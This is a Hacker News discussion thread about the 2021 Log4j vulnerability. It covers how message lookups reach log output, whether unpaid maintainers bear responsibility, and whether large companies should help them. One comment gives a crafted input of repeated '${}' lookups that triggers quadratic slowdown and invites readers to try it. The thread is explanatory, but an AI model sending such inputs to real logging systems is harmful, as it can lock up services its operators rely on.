Hacker News new | past | comments | ask | show | jobs | submit login
Log4j: Between a rock and a hard place (crawshaw.io)
553 points by todsacerdoti on Dec 11, 2021 | hide | past | favorite | 393 comments



Ironically, on a previous team I had switched our log4j2 log formats over to %m{nolookups} like 8 months ago... I didn't realize the whole jndi issue, what we ran into was the O(n^2) behavior of its string substitution.

While deploying an ancillary change, our jvms started locking up for minutes on end. What was happening was that we were logging customer input, and the change caused it to run certain things in parallel, which ended up logging the data multiple times. Normally the extra logging didn't matter but one customer had data like "${foo} ${bar} ${baz} ...". Even when the ${foo} portion is replaced wothout modification, this triggers quadratic behavior. So we were already potentially vulnerable to the DOS but it was rare enough that we never got locked up until logging the string multiple times, which then overflowed log4js internal buffer and blocked worker threads.

You can try this yourself by just logging a string like "${}${}${}..." And in fairly short order it starts taking forever. I'm very glad the fix in 2.15 is to disable lookups by default.

I hope that in the time after I left, the security org at the big tech company I worked at and reported this to (as I thought it was - a dos vector, not the complete pwnage it actually was) forced teams to switch to nolookups. Otherwise a lot of people had a bad week forcing updates through...


> So we were already potentially vulnerable to the DOS [...]

> the security org at the big tech company I worked at and reported this to

I'm confused about these two statements, because I did not find any recent CVEs for log4j in the DoS category, nor related to format lookup (other than CVE-2021-44228 of course).

Perhaps I misread it, but are you basically saying that (after you reported the issue to them internally) the security team at your previous company could not successfully report a DoS vulnerability in the default configuration of a widely used (by them, at least) Apache library and make sure a CVE got assigned to track it?

If so, it would be interesting to know where the CVE/vuln-reporting chain broke, possibly to reduce the blast radius for similar future cases.

Hypothetically speaking, a CVE in March for a DoS in a problematic design/feature could have resulted in flipping the default setting earlier. Instead of chasing live RCE in the wild in December.


no they're saying they discovered the behavior of their Log4j that was using interpolation was so slow that is had the potential of causing a DDoS at their company


There seems to be a misunderstanding here. We have on the one side a garbage feature that should never have been implemented - but if you want to keep it for backwards compatibility, sure. But then we have log4j scanning all values instead of only format strings - I think it can be argued that this behavior is a critical bug and was never intended to begin with. It seems to have only come about because whoever implemented the JNDI stuff lost their bearing in the absurd class hierarchies and abstractions in log4j.

Of course the last part holds the solution for our backwards compatibility issue. Remove the JNDI nonsense from the default package and move it into an extension package. Whoever wants to keep it can just add that to their dependencies and continue to enjoy logging functions that sometimes also make network connections and block your program.


Indeed - as evidence for this, I would submit that slf4j and logback were created to offer a drop in replacement for log4j (slf4j literally provides alternative implementations of the org.apache.log4j.Logger class), but I have never seen anybody complain that "I switched to logback and slf4j and my jndi substitutions stopped working."

Nobody thought this was how log4j worked; log4j's documentation for format syntax only covers {} placeholders - the same format that slf4j has grandfathered in from log4j.

I agree this feels like a case where they got confused about their internal terminology. Log4j refers to messages with {} placeholders as 'FormattedMessages'; it refers to the log pattern syntax as 'Patterns' in code - but it seems to refer to them as 'log formats' in documentation.

Somewhere in this mess, someone hooked up the pattern capabilities into the formatting system.


> but I have never seen anybody complain that "I switched to logback and slf4j and my jndi substitutions stopped working."

SLF4J was created to replace Apache Commons Logging and Logback was created to replace Log4j 1.x. Both were created Ceki Gülcü, the original author of Log4j 1.x [1].

Logback came out in 2006. The first beta version of Log4j 2.x was only released 6 years later in 2012, and the JNDI lookup feature was added in 2.0-beta9[2] in 2013!

Obviously nobody complained when switching from Log4j 1.x to SLF4J+Logback that a feature from a completely different library (with the same name) that would be created 7 years into the future was not supported.

> Somewhere in this mess, someone hooked up the pattern capabilities into the formatting system.

That's not what happened. The lookup mechanism (which includes "${jndi:}" lookups) is completely unrelated to the message formatting subsystem.

The way formatting and pattern lookups work in log4j2 is:

1. logger.info("Hello {}", "world") creates a FormattedMessage instance with the "Hello {}" format string and a single parameter, "world".

2. The FormattedMessage is wrapped in a LogEvent and routed to the correct appender(s).

3. Most appenders will format the LogEvent with a Layout. In our case, it's PatternLayout we care about[3].

4. PatternLayout will pre-calculate a set of PatternConverters based on your pattern, so it doesn't have to keep parsing the pattern on every invocation. "%m" will map to MessagePatternConverter.

5. (grossly simplifying zero-garbage and streaming optimizations) Each pattern converter is executed and appends to the final layout text's StringBuilder.

6. (grossly simplifying oh so many things) MessagePatternConverter will first call event.getMessage().getFormattedMessage(). The logic for formatting the message is entirely encapsulated by Message and its subclasses. MessagePatternConverter has no way to distinguish the format string from the user-provided parameters!

7. MessagePatternConverter finally applies the pattern lookups to the formatted message text. The pattern lookup mechanism is completely separate from and orthogonal to the message formatting mechanism.

---

That was long-winded, but I had to fight these annoying misconception about "log4j not implemented format strings properly".

Now, there are several things I'm not saying here:

1. I don't think more than a handful of people ever relied on lookups working on the log message (formatted or otherwise), as opposed to the pattern in the configuration file.

2. I don't think Log4j should have kept compatibility here. The moment the maintainers implemented "%m{nolookups}" (on version 2.7), they should have made it the default. That being said, I know this is very hard to do in the Java ecosystem. But I think it is time that the Java developer community changes its extremist position regarding compatibility at all costs.

3. I don't think that Log4j should have implemented pattern lookups for text messages to begin with. Even if was just the format string part (which is impossible to do with Log4j's current architecture anyway).

4. I don't think any kind of string formatting should be included in a logging library. If you want to format log messages, use an external formatting function or string interpolation (if you're lucky enough to be using Kotlin or Scala). If it is added, it should only be used as a convenience, and shouldn't do anything more than formatting (like lookups). Relying on developers to always remember that log.info("Hello {}", world) is safe and log.info("Hello {}" + world) gives the entire internet full control of your server is beyond stupid. Even if Log4j went with this silly distinction, I would say it was a horrible design.

[1] https://techblog.bozho.net/the-logging-mess/

[2] https://logging.apache.org/log4j/2.x/changes-report.html#a2....

[3] It seems like PatternLayout is the only layout vulnerable to this bug in log4j2, but it is hard to tell, the implementation being a classic Java mess of deep class hierarchy, liberal use of reflection to control everything and some heroic attempts to break SOLID principles at least 4 times on a single line of code. Take my analysis with a grain of salt. It's a gross simplification of what is unfortunately par for the course in many Java libraries.*


Thanks for bravely diving deeper into the class hierarchy than I did.

Your analysis of what should have been done in 2.7 is spot on.

Regarding my point about migration compatibility - I would not assume that the only time anyone has moved from log4j to slf4j was when slf4j first came out. Slf4j+log back is also a drop in replacement for log4j 2, up to a point.


Thank you for your kind words!

> Regarding my point about migration compatibility - I would not assume that the only time anyone has moved from log4j to slf4j was when slf4j first came out. Slf4j+log back is also a drop in replacement for log4j 2, up to a point.

In a way, you're right. By themselves, SLF4J+Logback are not drop-in replacement for Log4j 2.x (or Log4j 1.x for that matter), but Log4j 2.x does provide an adapter for that sends all the calls to log4j-api interfaces to whatever is implementing SLF4J (e.g. logback). It also provides an API that does the reverse (implementing SLF4J through whatever is implementing the log4j-api). To top that up are also adapters which converts Log4j 1.x API, the JUL APIs and Apache Logging Commons (yet another facade, like SLF4J or log4j-api 2.x) to SLF4J or and log4j.

Accounting for all the permutations there, there are probably thousands of slightly different migration paths that you could take, and they're all slightly different. This makes the situation a lot more complex than it seems, at first hand.

I think you're imagining a project which started with Log4J 2.x and moved to SLF4J+Logback. You're right that such projects may exist, but to be more accurate:

1. By the time Log4J 2.x has started, SLF4J was already established as the standard facade for Java logging libraries. Log4J provided an SLF4J binding from the get go, and I think many (if not most) projects which ended up using Log4J are using it through the the SLF4J binding.

2. By the time Log4J 2.x started getting popular (around 2014-5?), Logback Development slowed down. It was abandoned per se. There were still or or two minor releases a year until 2018, so it didn't die out, but showed slow progress. At the same time Log4J 2.x was adding new features quickly and making some impressive performance gains in multithreaded workloads[1]. So while there were some reasons to move from Logback to Log4j 2.x, there were no strong reasons to do the reverse.

In short, I don't think many people every migrated between them.

There is a better argument you can make of course: Log4j 2.x just removed supports for message lookups completely and no one complained. It shows that they could have just done it years ago with little worries. But we need to work harder to change the "compatibility über alles" mindset that prevails in Java and other ecosystem. It's perfectly ok to break compatibility for 0.001% of your users when you've got a serious security issue. Punishing 99.999% of the other users with an RCE because 0.001% MIGHT rely on some back is not good engineering!

[1] https://logging.apache.org/log4j/2.x/manual/async.html


> But then we have log4j scanning all values instead of only format strings - I think it can be argued that this behavior is a critical bug and was never intended to begin with.

It was actually intended behavior, and this is what really boggles the mind! Javadoc says explicitly that variable replacement is recursive, with cycle detection (which will throw! What happens to the log line in this case?) [0].

[0] https://logging.apache.org/log4j/2.x/log4j-core/apidocs/org/...


That link is about variable replacement in config strings, which is intentionally recursive. It doesn't mention the use of the variable replacement mechanism when interpolating values into log messages, which is what makes this vulnerability so bad, and as far as I can see was not intentional.


Right, I was also confused by the blame on backward compatibility. You can keep things backward compatible without necessarily making it on by default. There is no reason why `formatMsgNoLookups` should the default. If it is indeed an obscure and hacky feature for backward compatibility, just make it opt-in. People who really care about it will enable it, most people won't have to carry that baggage and we wouldn't be in a situation like this.


>for a feature we all dislike yet needed to keep due to backward compatibility concerns.

If they really dislike the feature that much, they likely dislike the code and want to completely delete it. I'm not sure if making it opt-in would make them as happy as fully deleting it, so they are less motivated to make it opt-in than they would be to fully delete it.


They could also "fully" delete it by putting it in a separate opt-in package.


Hindsight is always 20-20.


"lost their bearing in the absurd class hierarchies and abstractions" sounds familiar. Java app stack traces are like Neal Stephenson epics, but less entertaining.


And enabled by default. That's the most mind-blowing bit of this feature. The backcompat argument is a deflection for shipping a time bomb into people's codebases.


To be fair to the maintainers, they didn't ship anything into people's codebases. People chose Log4j and pulled it into their code. FOSS contributers aren't responsible for downstream use of their projects.


I don't think this argument makes much sense, beyond completely legalistic.

If you add backdoor to the used library, then yes you shipped it there. You don't have legal liability for consequences when it is found, but it does not make not being the one who shipped it.

It just protects you legally, as it should.


> I don't think this argument makes much sense, beyond completely legalistic.

The downstream users chose to use Log4j, chose to upgrade to the version where the exploit was introduced, chose not to audit the code. It's their responsibility and theirs alone.

A maintainer can release a new version of their software. No-one is under any obligation to use it. They certainly don't reach down into your repos and push their changes.

So I agree that the maintainers shipped a release. I certainly don't agree that the shipped it into anyone else's codebase.


> The downstream users chose to use Log4j, chose to upgrade to the version where the exploit was introduced, chose not to audit the code. It's their responsibility and theirs alone.

No. It is manipulative framing where responsibility for backdoor is pushed onto users.

It is especially ridiculous in the context of industry where not upgrading is seen as irresponsible. And especially ridiculous when the same industry pushes for open source and when companies eventually start to listen and use open source, acts like there was something wrong with using open source.


> No. It is manipulative framing where responsibility for backdoor is pushed onto users.

I fundamentally disagree that anything was pushed onto downstream users. They explicitly pulled Log4j.

Framing it as the maintainers pushing the update onto downstream users is itself so manipulative that I wonder if you are conversing in good faith. Framing the bug as a backdoor is absurdly manipulative.

The Apache License even warns the users explicitly:

> Unless required by applicable law or agreed to in writing, Licensor provides the Work (and each Contributor provides its Contributions) on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied, including, without limitation, any warranties or conditions of TITLE, NON-INFRINGEMENT, MERCHANTABILITY, or FITNESS FOR A PARTICULAR PURPOSE. You are solely responsible for determining the appropriateness of using or redistributing the Work and assume any risks associated with Your exercise of permissions under this License.


You are the part of the problem then.


Dude, take a step back here. You're using someone else's free code. Someone wrote some code for free, put it online, and said "yeah anyone can use this for free go ahead". They don't owe anyone anything.


Lack of legal liability for any kind of security exploit, and auditing processes for companies that allow wild west integration of libraries are the problem.


>It is especially ridiculous in the context of industry where not upgrading is seen as irresponsible.

Upgrading without due diligence, and without reason is as irresponsible an not upgrading when the need to becomes manifest.

Running "unsafe" versions of software in conditions where their unsafe nature is not open to exploitation is a completely legitmate action. If you upgrade just because there's a later version available, you're rolling the dice as needlessly as the fellow that'll get around to it once he has time to read the code.

Note: I'm aware of, and also cherish the no warranties explicit or implied clause. However, In real life, where social relationships do matter, I don't see this escape clause standing the test of time as society catches up the technology.


Totally agreed. If software is ever to become a serious and respected industry we can't just deny responsibility and blame the users as soon as something goes wrong.


You can already do like in real industries, pay someone to write you a logging framework and they will be responsible for it. Guess what, you can even pay someone to just be responsible and audit FOSS code for you. Looks like we are already a serious and respected industry that just contains a few complaining entitled users benefiting from the free work of others...


Why don’t all those people affected by this ask for their money back?


They wrote code essentially willing to run exec on any string passed to it, enabled this feature by default, and then didn't loudly warn people that any string passed to log4j must be trusted. None of this is competent work.


Surely then the responsibility lies with the people who decided to use this apparently incompetent work in their infrastructure?

If I release terrible software with a license that expressly has no warranty and someone uses it, surely that's on them?


You must audit every single line of code for every piece of software you use.


Maintainers have responsibility over their code, not how it is integrated. Here the problem is entirely in their code, it is not depending on the downstream project or any way it is used there.


Maintainers have no responsibility at all, unless they're paid or bound by contracts in some other way.

Some feel responsible regardless, but they certainly don't have to. They can even introduce vulnerabilities intentionally, and it's your responsibility if you trusted them not to.


> They can even introduce vulnerabilities intentionally, and it's your responsibility if you trusted them not to.

Is that true? I can add code in my open source library to steal credit card numbers, and if you use it that'd be your fault?


There is a reason why some companies have internal repos only policy, and libraries only get added to them after legal and IT review.


It's not true. There's a legal system and they cannot do intentionally illegal things and fraud.

But it's good to not trust random strangers at GitHub -- maybe a user profile is just a facade for a criminal gang, maybe untraceable so they can get away with it


Not every intentional vulnerability is meant for illegal things or fraud.


No, you can't escape legal responsibility from intentional sabotage that easily.


Intentional sabotage of my own project?

It doesn't take much imagination to come up with situations where one may intentionally introduce vulnerabilities in use-cases they don't care about in order to make handling of use-cases they do care about easier. Are you sure I can't "escape legal responsibility" for doing that in my own software that I share to others "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT? (emphasis not mine ;))


Irresponsibility != malice.

If your FOSS software uses plaintext passwords because you don't care about data-at-rest security for whatever reason, sure, you're not required to make all your public code super secure.

Otherwise all student projects uploaded to GitHub would be crimes.

If your FOSS software adds a bit of code that POSTs all inputted credit card numbers to https://seba_dos1.com, well, that's gonna look very different in court.

It's like holding a garage sale where you give stuff away for free. Nobody can complain if your old stereo that you gave away for free doesn't work, but if you have an old propane burner that's likely to sear somebody's face off, best to just throw it away.


Sounds as if you believe you could edit & change open source code to try to intentionally crash a car or an airplane, or just not care about that happening, and get away with it, just because "AS IS".


If the usage terms say "do not use in any critical applications", I would've thought that the responsibility for using the code in that fashion woudl be squarely with the entity that did the integration?

It'd probably be better if the usage terms would by necessity spell out that you were happy for the code to be used in life-critical situations, instead of having to opt out of it.


The default usage terms are "all rights reserved, nobody can use this but me". You change this by applying licenses which regulate the terms under which you're happy for the code to be used by others. The vast majority of popular Free Software licenses allow you to use the code under no guarantees whatsoever, so if you want to use some software in critical applications and hold its authors responsible if it doesn't work as advertised, you should probably pay them and include this responsibility in their contract.


Tell that to the people that removed their 'leftpad' repository.

Or the ones that are taking over FOSS project to inject 'telemetry' spyware


If you publish something, you have responsibility over it.


What kind of responsibility? In what sense? Could you give me an example?

By the way, this is a part of my license (a pretty common one):

  THE SOFTWARE IS PROVIDED "AS IS" AND THE AUTHOR DISCLAIMS ALL WARRANTIES
  WITH REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES OF
  MERCHANTABILITY AND FITNESS. IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR
  ANY SPECIAL, DIRECT, INDIRECT, OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES
  WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS, WHETHER IN AN
  ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT OF
  OR IN CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE.


No, I don't. You may want to read the licenses of the code you're using, by the way.


Imagine the liability of publishing any code if you are "responsible" for it. Meaning that you would be responsible for its improper use, or even use for illegal purpose.


You are though. Forget the legalese for a second.

You wrote the code and put it out there.

If you didn't, none of the uses of it would ever have come to fruition.

A court of law may let you duck out for the time being, but when you trace the chain of effective physical causality backwards, at the end of the day, you write it, you're responsible for making possible it's applications.

There is value to the code unwritten. That value is a clean conscience and true abscence of guilt or remorse for having enabled someone to do something monstrous.

I laugh at people who think a legal disclaimer absolves one of moral culpability. If only it were that easy.


I wonder how do the makers of kitchen knives sleep at night.


Exactly what part of:

THE SOFTWARE IS PROVIDED “AS IS”, WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.

Suggests that maintainers have any responsibility over their code?


There's a legal system too; that license text isn't the whole world.

However in this case, to me it seems they obviously have nothing to worry about. (Since this bug was unintentional)


It's not obvious that putting in this legalese covers you if you otherwise promote it as working software and invite people to use it, and details would depend on jurisdiction.


Has Apache 2.0 ever been pierced in court anywhere?


It’s the equivalent of shipping a car with faulty brakes. It’s really debatable who is responsible.


> for a feature we all dislike yet needed to keep due to backward compatibility concerns.

It's logging. While logging is extremely important, I think we could all tolerate removing a vulnerable feature. Or, just move the feature to a separate package.

I have made bad decisions, we have all made bad decisions. Own them, improve, and celebrate the opportunity to learn and improve. Keeping this around, as a default, was a bad decision. If your enterprise contracts don't want to turn a flag on, then they can always skip upgrading (they generally do regardless).


They didn’t know it was vulnerable, they just didn’t like it for other reasons.

Should maintainers of all core apache libs just remove or disable features they don’t like, when not known to be insecure?

That said, log4j2 isn’t that old. Not sure why this was added in the first place. At the very least it’s a performance issue.


> Should maintainers of all core apache libs just remove or disable features they don’t like, when not known to be insecure?

I'd bet more will start doing so. If nobody is excited to keep the feature up and any unloved code contains risks, getting rid of it seems fine to me. If companies want that code maintained, they can pay up or get one of their people to do it.


> Should maintainers of all core apache libs just remove or disable features they don’t like, when not known to be insecure?

If noone funds their development and they maintain it for free? Then yes, why not.


If you are not being paid for it why build features you don't like? That is what you do in your day job! Your hobby project should atleast should make you happy ?


> Should maintainers of all core apache libs just remove or disable features they don’t like,

Why not? I can just go into a parity package.


I can imagine the maintainers being scared of silently breaking the workflow and monitoring for some users. If you change this feature to opt-in, you may silently break the alerting system users built on top of this feature, and then you get the heat for breaking a somebody’s IT system(a hospital maybe), just because you hated that feature. That it had an RCE would not be known at the time.

In a perfect world, the feature would have been an option from the start, but in that same perfect world, the downstream users would be diligent and check release notes before upgrading. You might, but many of your colleagues don’t, they just upgrade, and complain when their system breaks.


That's why you have versioning: removing the feature would be a breaking change and indicated as such.


One place I worked used syslog to ship important analytics data from services to Kafka. log4j is a reasonable choice for logging to syslog from Java (but let's be honest, you should be on Logback). Now, using jndi as part of this? That's getting a little too clever.


Keeping this around, as a default, was a bad decision.

Definitely. But really, they were screwed once it had shipped. They could and should have disabled it in an update long ago, but then anyone who read the release notes or the code would know how to exploit the millions of un-updated systems.


Recent and related:

Log4j RCE Found - https://news.ycombinator.com/item?id=29504755 - Dec 2021 (457 comments)

Widespread exploitation of critical remote code execution in Apache Log4j - https://news.ycombinator.com/item?id=29520415 - Dec 2021 (80 comments)


People and, many companies seem to forget that such software comes "AS IS" and it means, AS IS, I would be glad to see fortune 500 companies try to put together a team providing flawless logging capabilites. In reality I know they would not be able to get to be half as good as an open source library, fist of all drowning developers in unnecessary administrative tasks, imposing stupidly unreasonable deadlines and fully ignoring engineering advice from... well the engineering team. It's an insult that those companies profiting masively from so many open source projects still have the audacity to put blame on (again) software whose premise is "AS IS" specially when if you look at their projects (even the ones they sell to their customers) are basically bullshit put thogether with spit and boogers (and I've work in more than one FAANG to know this is truth by experience)


Yes, log4j is garbage "as is" and should be avoided.


Console.log("my message")

Job done.

Logging libraries are unnecessarily complicated.


Cool, now make it so that only high-severity logs from a particular set of subroutines get sent to a particular subset of employees, grouped into a daily email.

And make it possible to change any of those knobs at runtime, without touching the code (minimum severity, set of subroutines, set of recipients, delivery method).


There is an argument to be made that all those actions should be done by an external log parsing tool.

As with many things there is no easy right or wrong. For example, I want to be able to set log-level on different classes dynamically but where to draw the line?


> There is an argument to be made that all those actions should be done by an external log parsing tool.

Yes, keeping them separate is typically good, especially if you have multiple applications. There are also some instances where doing so leads to duplicate configurations that need to be kept in sync, and so you might want to have that logic bundled in the application itself.

In my workplace we have two options for sending Slack alerts - one from our NewRelic cloud account alerts, one built-int in the logging framework. We use either for different purposes.

> As with many things there is no easy right or wrong. For example, I want to be able to set log-level on different classes dynamically but where to draw the line?

Exactly. My point wasn't that everybody needs a Swiss Army Knife structured logging framework, it was that OP's glib dismissal that 'console.log(), job done, why are you making this so complicated?' was naïve and obtuse.


Log parsing service filters and alerts (data dog, newrelic, splunk etc..)


Now add a date/time stamp. And thread name, current class/method, request trace ID, severity level, etc., to every log line in your app. Or just grab your favorite logging lib from Maven Central and call it a day.


I'm still flabbergasted that the original maintainers are rushing around trying to patch these problems. Unless their specific personal/professional projects are at risk they have no responsibility to hurry and fix a thing.

You'd think, in the spirit of open source, these multi-billion dollar companies--like Apple and Google and Amazon--would recognize the danger and immediately divert the best engineers they had to help this team identify and mitigate the problems. They should have been buried in useful pull requests.

For that matter, they should have really picked them all up in private jets and flown them to neutral working space with those engineers for a one or two week hackathon/code sprint to clean up the outstanding issues and set the project on a sustainable path. To get those maintainers there they should offer a six figure consulting fee and negotiate with their current employers to secure their temporary help.

I can't believe these folks just get abandoned like this while CEOs/CTOs from rich companies wring their hands wailing about the problems and not offering solutions.


> I'm still flabbergasted that the original maintainers are rushing around trying to patch these problems. Unless their specific personal/professional projects are at risk they have no responsibility to hurry and fix a thing.

Sorry, but what's the hard part to understand? Open source maintainers end up in this position because they are nice, helpful people who like using computers to solve problems for others. People who spend years on a project and then see a bigger problem arise don't suddenly turn that off. With the bigger problem, they'll want to work harder, not just hoist a middle finger and go binge Netflix without a care in the world.

But I totally agree with you on the CTOs, etc. I don't expect random programmers who like working on logging to also be good at solving complicated sociotechological problems around paying for global infrastructure. But it boggles my mind that none of these richly rewarded, supposedly brilliant experts at organizing engineers has gotten out in front of this. If not out of community spirit or social responsibility, then out of pure self interest.


> none of these richly rewarded, supposedly brilliant experts at organizing engineers has gotten out in front of this

Indeed. Each of them has had to spend the last few days madly trying to fix this problem to avoid exposing exposing their infrastructure. Each has been, in some way, replicating the wheel to do so. I'm curious how many will actually submit their findings to the original OSS so others can learn from their experience?

There's always resources to put a fire but rarely enough to install a sprinkler system.


For sure. And this was a richly predictable fire. Not this specific problem, of course. But there have been enough fires like this in the past that it makes no sense for companies to act like it won't happen again and again.


> they'll want to work harder, not just hoist a middle finger.

There is a perfectly healthy, acceptable, middle ground between those two extremes, however.


Oh? One that's comfortable and easily available to the kind of person who has spent years on an open-source project? One that won't increase the crap they're getting from project users and random strangers? Do tell.


Yes. It's quite simple. There's absolutely no need from maintainers to "rush" to do anything, just do it in a comfortable timeline. And no, this is not equivalent to giving people the finger. Only dishonest people would say so.


Ah, the magic "just". I don't think you've really grasped the kind of people who spend years maintaining open-source projects. This is like asking sysadmins to ignore alarms and downtime. The kinds of people who can be comfortable ignoring downtime rarely become sysadmins and don't last if they do.

Feel free to prove me wrong by pointing to the major open-source project you've led for years and how good you have been at ignoring problems with it.


No, the magic word is "healthy". I said "healthy, acceptable, middle ground". This means learning to say "no" or at least "later, when I have the time".

I have maintained open-source projects myself for about 15 years, and it is completely different from sysadmin alarms. I can do it on my time, and even if with vulnerabilities I do it on the time I have previously allotted for doing it, since my family and my job comes first. And no, I won't dox myself. There, I "just" said "no" to you. That's a healthy way of establishing boundaries.

By the way, feel free to prove that I'm wrong in saying that by pointing to any law that says I have to do otherwise.

And no, just because people have unhealthy behaviours doesn't make it a rule or a law.


Oh? Which projects? I'm skeptical that they are of the scale and importance we're talking about here. And as somebody who has done open-source stuff and also done sysadmin work, I say that there are commonalities, so you can't just handwave it away.

I agree that unhealthy behaviors don't make it a rule. But deep-set behaviors don't change overnight. And it's not clear to me that people who are perfectly healthy would ever put themselves in the situation of maintaining important infrastructure for free. As mentioned elsewhere, I've closed down an open-source project of mine because it grew too big and became more of a drain than a pleasure. But if everybody did that, we'd have a lot fewer open-source projects. So I think your breezy "just" only works for the kind of people who would never have ended up with this problem in the first place.


The answer is not to close open source projects, but establish healthy boundaries between your audience and yourself. And no, you don't have to be healthy to establish those boundaries, but you do need these boundaries if you want to be healthy.

Rather than giving up and closing a project, my answer to abuse and unreasonable demands is to be liberal with ignoring and blocking. It's not my fault that someone chose to berate me, but it's my choice to keep giving them a way to do it. But most of the time, a simple "I will do it when I have time" is more than enough. I believe in carefully curating the online places I manage in order to maintain a healthy atmosphere. I choose health and well-being above "popularity at all costs".

About the projects, I'm not gonna dox myself, and I don't think the cross-examination is warranted or even in the spirit of this site. I believe my post stands by itself. You can doubt all you want, but that only solidifies my belief I'm doing the right thing.


I'm not saying you aren't doing the right thing. Good for you. Stay healthy.

I am saying you are delusional to talk as if what's easy for you is what's easy for others. And that you're failing to consider that people who are in XKCD's "random person in Nebraska" bucket [1] are much less likely to have good habits and healthy boundaries in the first place, because people like that end up bailing much earlier.

[1] https://xkcd.com/2347/


Bullshit. I utterly and completely disagree that the boundaries I mention are hard to implement. I will also say that boundaries and limits are not only healthy, they are absolutely necessary for long-term, large-scale, open source projects, and this is why those projects survive. People on FOSS rarely get to be long-term maintainers without establishing clear boundaries, so most active long-term maintainers obviously do have the boundaries I mention. This is a lot of people. I'm clearly not taking hobby projects, I'm talking about packages with thousands to millions of weekly downloads, for example.

The myth of the hero maintainer must die.

Binging Netflix is completely acceptable if you're in your free time. EVEN if the package has a RCE vulnerability. And most maintainers of popular projects will agree with that.


Easy for you does not mean easy for others. If you think boundaries are easy for everybody, go read Reddit's AITA, where you will find a flood of people who struggle with it, generally because important figures in their lives train them not to have boundaries: https://www.reddit.com/r/AmItheAsshole/

I'm glad it's easy for you. But therapists can spend years working with people on establishing and maintaining boundaries in important relationships. You can't just handwave the difficulty away. Especially when so many tech jobs discourage having a good sense of boundaries in the first place. E.g., all the startups where people are expected to be bought in to a vision of changing the world, working crazy hours. All the bosses that talk about their teams being like families. All the places that talk up commitment and loyalty and going the extra mile. Which again you can see a flood of if you care to look: https://www.reddit.com/r/antiwork/

> And most maintainers of popular projects will agree with that.

[citation needed]


You're reaching and you're constantly misrepresenting and replying to exaggerated interpretations of my views. Unpaid OSS maintainer work is nothing like startup work or a similar to the issues in antiwork. The boundaries are much easier and much more obviously necessary than in any other relationship because direct contact is not mandatory, and productive work is impossible without them. Also, even if impossible for one person, other co-maintainers can even help with those boundaries, and there are tools available for that. Of course there will be people unable to work healthily with OSS, but those people will burn out very quickly and they won't be able to be long-term maintainers, period. Also, keep in mind that a large part of OSS maintainers are paid by companies to work with OSS and they do it on company time.

I'd likewise ask for a citation of some maintainer agreeing that watching Netflix on their free time is akin to "giving the middle finger" to users. That was one of the most toxic phrases related to OSS maintainer work I've ever seen on this website, and those views should not be spread as if they were acceptable. I stand by my opinion that the "work harder" vs "watch Netflix" is a completely fabricated dichotomy, and there is a very viable middle ground available (and necessary) for everyone.


> You'd think, in the spirit of open source, these multi-billion dollar companies--like Apple and Google and Amazon--would (...) mitigate the problems.

FAANG engineer here, and one who had to work extra hours to redeploy services with the log4j vulnerability fix. I'm not sure you understand the scope and constraints of this sort of problem. Log4j's maintainers have a far more difficult and challenging job than FANGs or any other consumer of a FLOSS package, who only need to consider their own personal internal constraints, and if push comes to shove can even force backwards-incompatible changes. The priority of any company, FANG or not, is to plug their own security holes ASAP. Until that's addressed the thought of diverting resources to fix someone else's security issues doesn't even register on the radar. I mean, are you willing to spend your weekend working around the clock to fix my problems? Why do you expect others like me to do that, then? Instead I'm spending a relaxing weekend with my family with the confort of knowing my service is safe. Why wouldn't I?


I'm not saying you, as an engineer for those companies, should be the one to donate your time and energy toward the problem. We all have competing priorities, as do the maintainers of those FLOSS packages.

I'm saying that your company's CTO, especially one with a very large companies, could likely identify two or three engineers who they pull into a meeting and say "reach out to these guys and get them whatever they need. Here's my cell, call me the moment you need the plane or additional resources."

Seriously, if a CTO has a budget of a few hundred million dollars and thousands of dedicated employees, how hard is it to throw a few crumbs to the open source community to change this situation from being one of a burden on a volunteer effort to, instead, one where they feel like they're in the middle of an international event where their knowledge and services are vital to keeping the internet alive?

Again, I'm exaggerating, but you see where I'm going with this. It's a missed opportunity for some seriously great PR out of a seriously bad situation.


Some time ago, I saw this suggestion from a disaster relief specialist directed towards those who want to help with disaster relief: the best thing you can do after a disaster is stay away. Taking yourself to the disaster zone very often at best consumes scarce resources from those present to manage the disaster trying to bring you up to speed and at worst creates new problems that need solving.

It's not hard to extend this to the kind of software security flaw here. If I'm a developer on a package with a critical security vulnerability that needs to be fixed now, sending me extra developers who know absolutely nothing about the code I'm working on isn't going to be helpful--it's just going to waste my time trying to bring them up to speed (or more often, telling them to just go away). If I actually need help, I'll ask the people who I know can help me; trying to sift through unsolicited help to figure out who actually has the skills to do so would take too much time.

So think hard about what help Google et al could actually be providing to help log4j here. If you have to resort to clear exaggeration to find examples... maybe that's a sign that there actually isn't all that much that they could be doing that would actually be helpful.


> So think hard about what help Google et al could actually be providing to help log4j here.

I think you make a perfectly valid point and one that shouldn't be overlooked. How about this:

"Here's a $100K and an isolated penthouse suite down the road rented for the month where you can focus on fixing the problem and not be interrupted by screaming children. Here's a phone number if you need to delegate any specific tasks to additional teams."

Incentive to help. No added pressure. Just one practical example.


I don’t quite understand why you keep coming back to luxury apartments and private jets.

If children and family were viewed as too much of a distraction, I’m pretty sure the CTO (in this scenario) would simply choose a developer who lacks those distractions.

Let’s say the engineers chosen do have family. Why wouldn’t the company just comp a room in a local hotel?


I'm so confused. I thought we were talking about a single volunteer open source developer responsible for a vital tool, and it was too onerous to give them additional staff.


